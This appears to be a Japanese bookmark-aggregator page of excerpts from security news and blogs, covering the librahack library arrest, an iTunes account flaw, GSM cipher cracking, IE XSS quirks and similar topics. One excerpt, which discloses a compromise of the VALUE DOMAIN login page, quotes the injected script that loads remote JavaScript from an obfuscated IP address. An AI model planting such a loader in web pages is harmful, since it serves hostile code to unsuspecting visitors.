岡崎市中央図書館 #librahack 事件を取材した朝日新聞記者さんへの質問と回答まとめ (8月21日分)
神田 大介 @kanda_daisuke みなさま、おはようございます。記事を書きました朝日新聞の神田と申します。今回の件では、ツイッターやブログなどネット上の情報をたくさん参考にさせていただきました。まずはお礼を申し上げます。 #librahack 2010-08-21 08:50:36 神田 大介 @kanda_daisuke この件では、およそ2か月間にわたって取材を続けてきました(毎日この問題だけに専従していたわけではありませんが)。記事に書かれていることはほんのエッセンスに過ぎず、また広範囲な新聞読者を想定しているため、いろいろと表現を「丸めて」あります。 #librahack 2010-08-21 08:53:14
岡崎市中央図書館に1秒間に1回アクセスしたら逮捕されたけど不起訴になった件について
岡崎市中央図書館に1秒間に1回アクセスしたら逮捕されたけど不起訴になった件について。 当事者からの報告とそれに関連した高木先生などのつぶやきをまとめています。不完全かつ進行中です。
asahi.com(朝日新聞社):iTunes、IDなりすましの恐れ アップル社調査 - 社会
代金の不当請求被害が多発しているアップル社の音楽配信サイト「iTunes(アイチューンズ) Store(ストア)(iTS)」で、一定の条件がそろうと、見ず知らずの他人に自分名義で音楽ファイルなどを買われる状態になる恐れがあることがわかった。パスワードを変える際の本人確認が不十分な可能性があり、同社も事実関係の調査を始めた。 iTSの利用者は購入前にIDとパスワード、代金を支払うクレジットカード番号などを登録する。IDとパスワードは、対になって本人確認に使われる。 だが、千葉県の女性は約2週間前、実在する北海道の女性の利用画面に偶然に入ってしまった。千葉県の女性によると、新しく設定したIDでiTSに接続し、パスワードを入れたところ、何度か「違う」と接続を拒まれた。パスワードを再登録し、再接続してみると、個人情報の画面に北海道の女性の住所や電話番号、クレジットカード番号の一部、誕生日などが
GSMの暗号が解かれた模様 - masayang's diary
PCWeek: Hackers Show It's Easy to Snoop on a GSM Call PCWorld: GSM Encryption Cracked, Showing Its Age BBC: Secret mobile phone codes cracked 日本では使われていない(が、世界では主流に近い)携帯電話通話方式のGSMに使われている暗号が解かれた模様。 この手の研究は多くの国で違法らしい。米国では電話盗聴技術の議論すらご法度なんだとさ。 が、弁護士の指導の元、違法とならないように研究したKarsten Nohl氏は、GSM通話に使われている暗号の解読に成功。既に2TBに及ぶ逆引きデータベースを用意したらしい。 現時点ではリアルタイム盗聴に必要なハードは3万ドル。 ムーア法則によれば、再来年には半額になる(笑 さてさて...GSM網に依存している国々はどう
IBM、「ウェブはかつてないほど危険な状態」と警告
IBMは9月1日、2009年上半期の「X-Forceトレンド&リスクレポート」の結果を発表した。ウェブクライアント、ウェブサーバ、ウェブコンテンツなどへの脅威について、対処できないほど攻撃が集中しており、かつてないほど危険な状態になっていると警告している。 IBMは、PDFファイルによる攻撃の巧妙度が増したことを指摘する。2009年上半期に公開されたPDFの脆弱性は、2008年通年に公開された合計数をすでに上回っており、マイクロソフトOffice文書の脆弱性を上回ったという。 ただ、2009年上半期における全体的な脆弱性の数については、前年同期に比べて8%減少した。マルウェアの数は同9%増で、トロイの木馬が全体の55%を占めている。 フィッシング発信元の国も2008年から大きく変化した。2008年にはスペインとイタリアが2大発生元だったが、スペインはトップ10に入らず、イタリアは10位とな
崩れゆく「Mac OS X安全神話」
Mac OS Xは一部の人から極めて安全なOSだと思われている。その人たちは、同OSには多くのセキュリティ機能があるため、Appleのソフトを使えば、危険を冒してMicrosoftのWindowsを使うよりもずっと安全でいられると主張している。Microsoftがパッチを当ててきたセキュリティ脆弱性の数と、Appleのそれとを比べれば証拠は歴然だと彼らは言う。そのロジックの真相が見え始めていることを彼らは知りたがるかもしれない。それは単なるミスリーディングなのだ。 Appleは先に、Mac OS X 10.5 Leopardのアップデートをリリースした。Airportシステムとの互換性向上やBluetoothの信頼性強化のほか、18件のセキュリティフィックスを盛り込んでいる。これらのフィックスは、悪意を持ったハッカーがシステムファイルにアクセスすることを許したり、第三者が画像リンクを利用し
社内LANファイルのセキュリティについて。…
社内LANファイルのセキュリティについて。 社内の共有サーバー上にあるファイルの、不正コピーを防ぐ方法を探しています。 だいたいはWindowsやsambaで共有フォルダをつくって ファイルをそこに置いて、みんなで自由に削除やコピーができると思います。 これを、USBへの保存やFTPやヤフーメールなどへ添付して送信などの、 外部へファイルを持ち出せない仕組みを希望しています。 社内LANで使う分には削除や移動・コピーなどを自由にできないと不便なので、 外部へ持ち出せない方法、としてアドバイス頂けますと助かります。 以前、某大企業(非IT系)で働く人が、 やめる際に重要なデータをしこたまとってやめたというのを聞いたことがあり、 セキュリティ対策をしっかりしておこうと思っています。 特にIT系は比較的自由にファイルアクセスができないと いろいろ不便なので、どうしているのか気になります。 よろし
CNET Japan
人気の記事 1「Pixel Watch 2」の一部機能、初代モデルでも利用可能に 2024年03月05日 2マイナカードのiPhone搭載「もうちょっとお待ちを」--河野大臣が笑顔で言及 2024年03月05日 3計算アプリ「Photomath」、グーグルのアプリとして公式に公開 2024年03月04日 41ビットコインが1000万円を突破--史上初 2024年03月05日 5バンナム、シリーズ完全新作「学園アイドルマスター」--「成長を描く」にこだわり 2024年03月05日 6「Pixel」、Ultra HDR写真と10ビットHDR動画をInstagramに投稿可能に 2024年03月05日 7格安にゲームに課金できる?--「課金代行」の仕組みと手を出してはいけないワケ 2024年01月27日 8楽天の株価に連動して「楽天ポイント」が増減する新サービス 2024年03月05日 9【追記
VALUE DOMAINにウイルスコードが仕込まれる! | 無題ブログ
VALUE DOMAINにウイルスコードが仕込まれる! VALUE DOMAINのHPの一部のページにウイルスが仕込まれてるようです。 ウイルスコードが仕込まれているページは、VALUE DOMAINのログイン画面です。(まだ修正されてないのでリンクは切ってます) ttps://www.value-domain.com/login.php 上記にアクセスをしたらjavascriptが読み込まれるようです。 PLAIN TEXTJavaScript: <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "http://1856317799:888/s.js"; try {document.getElementsByTagName('head')[0].appendChild(js
Expired
Expired:掲載期限切れです この記事は,産経デジタルとの契約の掲載期限(6ヶ月間)を過ぎましたので本サーバから削除しました。 このページは20秒後にNews トップページに自動的に切り替わります。
ブログシステム「Movable Type」に複数の脆弱性
独立行政法人 情報処理推進機構セキュリティセンター(IPA/ISEC)および有限責任中間法人 JPCERT コーディネーションセンター(JPCERT/CC)は、シックス・アパートが提供するブログシステム「Movable Type」に複数の脆弱性が存在すると公表した。 今回確認された脆弱性は、Movable Type 4.25 Enterprise およびそれ以前、Movable Type 4.25(Professional Pack、Community Pack を同梱)およびそれ以前、Movable Type Commercial 4.25(Professional Pack を同梱)およびそれ以前、Movable Type 4.25(Open Source)およびそれ以前のバージョンに存在する。 この脆弱性が悪用されると、悪意ある利用者によって細工されたウェブページをユーザーが読み込ん
[柔軟すぎる]IEのCSS解釈で起こるXSS
[柔軟すぎる]IEのCSS解釈で起こるXSS:教科書に載らないWebアプリケーションセキュリティ(3)(1/3 ページ) XSSにCSRFにSQLインジェクションにディレクトリトラバーサル……Webアプリケーションのプログラマが知っておくべき脆弱性はいっぱいあります。そこで本連載では、そのようなメジャーなもの“以外”も掘り下げていきます (編集部) なぜか奥深いIEのXSSの話 皆さんこんにちは、はせがわようすけです。 第1回「[これはひどい]IEの引用符の解釈」と第2回「[無視できない]IEのContent-Type無視」でInternet Explorer(IE)の独自の機能がクロスサイトスクリプティング(XSS:cross-site scripting)を引き起こす可能性があるということについて説明してきました。 第3回でも引き続き、IE特有の機能がXSSを引き起こす例ということで、
![[柔軟すぎる]IEのCSS解釈で起こるXSS](https://cdn-ak-scissors.b.st-hatena.com/image/square/6e84fc6ab06f31b2e64248cbfc92fe06deb5bab5/height=288;version=1;width=512/https%3A%2F%2Fimage.itmedia.co.jp%2Fimages%2Flogo%2F1200x630_500x500_ait.gif)
高木浩光@自宅の日記 - 「NoScript」をやめて「RequestPolicy」にした
■ 「NoScript」をやめて「RequestPolicy」にした セキュリティ屋が、Firefoxユーザに「NoScript」の使用を推奨することがしばしばあるが、私は賛同しない。 JPCERT/CC、技術メモ「安全なWebブラウザの使い方」を公開, INTERNET Watch, 2008年11月4日 *1 技術メモ − 安全なWebブラウザの使い方, JPCERT/CC, 2008年11月4日 IV. 各 Web ブラウザに共通する設定上の注意事項 1. スクリプト等の実行を制限する JavaScript 等のスクリプトや(略)は(略)Ajax に代表されるインタラクティブなインターフェースが実現できるなど、高い利便性が得られます。反面、PC 上の重要なファイルを削除・変更するなど、悪意を持った処理が行われる可能性もあります。従って無制限にスクリプト等を実行できるようにしておくのは
アドビ製品のセキュリティ問題に苦しめられる企業
AdobeはAdobe Reader 9.1およびAcrobat 9.1に存在する、緊急度の高いゼロデイ脆弱性を修正するパッチのリリース日を、米国時間5月12日に設定している。 Adobeの公式なセキュリティ勧告では、この脆弱性の深刻さを認めており、ユーザーに対してコード実行攻撃を避けるための一時的な対策として、JavaScriptを無効にすることを勧めるアドバイスを繰り返している。しかし、このAdobeの緩和策は実現が難しく、さらに悪いことに、企業環境では役に立たないという愚痴が顧客から聞こえてきている。 (参照:Adobe Readerの新たなゼロデイ脆弱性に対する攻撃コードが公開される) ニューヨークに本社を置く電子商取引企業のセキュリティ担当役員であるErik Cabetas氏は、歯に衣着せず次のように述べている。 これはうまくいかない。これでは、JavaScriptは無効にできな
高木浩光@自宅の日記 - 無責任なキャリア様に群がるIDクレクレ乞食 ―― 退化してゆく日本のWeb開発者
馬鹿じゃないのか。このようなセキュリティに関わる情報公開ページは https:// で提供する(閲覧者が望めば https:// でも閲覧できるようにする)のが当然なのに、携帯電話会社ともあろうものが、そろいもそろってこんな認識なのだ。 (8月2日追記: ソフトバンクモバイルについては「7月27日の日記に追記」参照のこと。) それをまた、ケータイWeb関係者の誰ひとり、疑問の声をあげていないことがまた、信じ難い。何の疑問も抱かずにこれをそのまま設定しているのだろう。 こんな状態では、ケータイWebの運営者は、DNSポイゾニング等で偽ページを閲覧させられても、気付かずに、偽アドレス入りの帯域表を信じてしまうだろう。 つまり、たとえば、example.jp というケータイサイトを運営している会社が example.co.jp であるときに、攻撃者は、example.co.jp のDNSサーバに
狙われた“つぶやき”――Twitterに仕掛けられたワナ
Twitterのつぶやきが狙われた。しかし、これは氷山の一角かもしれない。それだけ拡大したTwitterは、これからどのような方向に進んでいくのだろうか。 2008年4月23日に日本版サービスが開始されて、まもなく1周年を迎えるミニブログサービス「Twitter」。米comScoreの調査によれば、全世界のTwitterのトラフィックはここ数カ月で急増し、2月には伸び率が700%を超えたという。しかも、爆発的な成長の背景には、従来の主なユーザー層である18~24歳よりも、20代後半~50代のユーザーが急増していることもあるようだ。 そして、ユーザーが増えるとともに、さまざまな犯罪の標的にもなってきている。このことは、以前も伝えた通りだが、その時は想像し得ないほどの急増ぶりなのだ。 リンクをむやみにクリックしてはいけない? 4月12日、米TwitterはXSS脆弱性を突いたワーム攻撃を受けた
Firefoxアドオンの「Web Developer」を使ってセキュリティ問題を発見
「作業にツールが必要だが適当なものがない」という状況に陥ったことはないだろうか。例えば、煙探知器の電池を交換しようというときや、ドアノブのがたつきを直そうというときのように。 こうしたときに必要なツールはいつも手元にあるわけではなく、場合によっては買いに行かなければならないかもしれない。開発者が忘れがちなのは、プロジェクトで対処しなければならない問題は、意外にも、バターナイフやつめ切りといった日用品になぞらえられるようなありふれたツールを使って解決できる場合が多いということだ。 アプリケーションセキュリティの分野に目を向けると、そうしたツールとしてFirefoxのアドオン「Web Developer」が挙げられる。 Web Developerは、セキュリティテスト用のツールと思われることはまずないが、この用途に重宝する。作者のサイトから手軽にダウンロード、インストールできて便利な上、無料だ
中堅企業には中堅企業ならではのセキュリティ対策を
中堅企業には中堅企業ならではのセキュリティ対策を:セキュリティ、そろそろ本音で語らないか(5)(1/3 ページ) 大企業のセキュリティ対策はほぼ完了、次はSMB市場だとセキュリティ業界はいいます。果たしてSMB市場のセキュリティ対策は、「大企業に導入した製品の廉価版」を入れるだけでいいのでしょうか。第5回では中堅企業のセキュリティ対策を“三輪節”で解説します(編集部) SMB市場は次の波? 私が前職でセキュリティサービスを提供していたときには、顧客は上場企業か政府系がほとんどでした。それはそういうお客さまを意識したサービスを提供していたからではなく、結果的に大企業や政府機関しかお客さまになっていただけなかったのです。 日本の企業の大部分を占めるのは中小企業であり、俗にいわれるSMB(Small and Medium Business:中堅・中小企業)市場はセキュリティ業界からは未開の地であ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
IT news, careers, business technology, reviews
発注者のためのWebシステム/Webアプリケーション セキュリティ要件書|脆弱性診断.jp